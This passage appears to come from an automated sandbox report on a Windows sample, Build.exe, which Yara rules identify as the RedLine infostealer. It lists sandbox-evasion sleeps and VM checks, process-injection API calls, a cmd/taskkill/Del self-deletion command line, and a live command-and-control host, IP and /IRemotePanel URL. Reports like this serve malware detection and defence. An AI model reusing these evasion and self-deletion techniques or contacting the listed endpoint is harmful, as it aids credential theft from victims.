Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Build.exe Memory allocated: CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Memory allocated: 2740000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Memory allocated: D60000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Build.exe TID: 5968 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Build.exe TID: 5576 Thread sleep count: 134 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Build.exe TID: 4144 Thread sleep count: 166 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: Build.exe Binary or memory string: <VirtualMachine>k__BackingField
Source: Build.exe Binary or memory string: set_VirtualMachine
Source: Build.exe Binary or memory string: VMwareVMware
Source: Build.exe Binary or memory string: VMWare
Source: Build.exe Binary or memory string: get_VirtualMachine
Source: Build.exe Binary or memory string: VEN_VMWARE
Source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\Build.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: Build.exe, LibInvoker.cs Reference to suspicious API methods: NativeMethods.GetProcAddress(SystemNetMailSmtpNtlmAuthenticationModuleC, MicrosoftWinTimerElapsedEventHandlerKtionName)
Source: Build.exe, LoadExecutor.cs Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.VirtualAllocExDelegate>("VirtualAllocEx")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, ptr3->OptionalHeader.SizeOfImage, 12288u, 64u)
Source: Build.exe, LoadExecutor.cs Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.WriteProcessMemoryDelegate>("WriteProcessMemory")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, lSqlDependencyProcessDispatcherSqlConnectionContainerHashHelperU, ptr3->OptionalHeader.SizeOfHeaders, IntPtr.Zero)
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Build.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Build.exe Queries volume information: C:\Users\user\Desktop\Build.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Build.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: Build.exe, type: SAMPLE
Source: Yara match File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: Build.exe, type: SAMPLE
Source: Yara match File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1464753 Sample: Build.exe Startdate: 30/06/2024 Architecture: WINDOWS Score: 100 20 15.164.165.52.in-addr.arpa 2->20 22 medical-m.gl.at.ply.gg 2->22 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 7 other signatures 2->32 8 Build.exe 14 2 2->8         started        signatures3 process4 dnsIp5 24 medical-m.gl.at.ply.gg 147.185.221.16, 49731, 6677 SALSGIVERUS United States 8->24 34 Self deletion via cmd or bat file 8->34 12 cmd.exe 1 8->12         started        signatures6 process7 process8 14 taskkill.exe 1 12->14         started        16 conhost.exe 12->16         started        18 choice.exe 1 12->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.185.221.16
 medical-m.gl.at.ply.gg United States
12087 SALSGIVERUS false

Contacted Domains

Name IP Active
medical-m.gl.at.ply.gg 147.185.221.16 true
15.164.165.52.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://medical-m.gl.at.ply.gg:6677/IRemotePanel false
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown